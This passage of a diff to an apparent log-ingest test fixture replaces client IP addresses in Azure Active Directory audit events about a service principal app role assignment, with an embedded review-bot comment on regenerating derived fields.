alue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -15380,9 +15380,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-"ActorIpAddress": "83.57.233.151",
+"ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
-"ClientIP": "83.57.233.151",
+"ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
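Review bot: The `ActorIpAddress`/`ClientIP` values in this expected-output fixture look hand-edited; if the ingest pipeline also derives fields from this address (for example `client.ip`/`source.ip` and any `geo`/`as` enrichment objects), those expected values must match the new address as well, which regenerating the file with `elastic-package test pipeline -g` guarantees and a search-and-replace does not. The same applies to the hunks at -15646, -15912 and -16178 and to the `event.original` hunks at -15616, -15882 and -16148, where the raw string and the parsed `o365audit` fields do agree on 67.43.156.15. That address presumably falls in the reserved test range the commit message calls the supported subset, so any enrichment derived from it would be deterministic in CI rather than depending on a live GeoIP database for a third-party ISP address like the one removed.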
@@ -15616,7 +15616,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -15646,9 +15646,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-"ActorIpAddress": "83.57.233.151",
+"ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
-"ClientIP": "83.57.233.151",
+"ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -15882,7 +15882,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"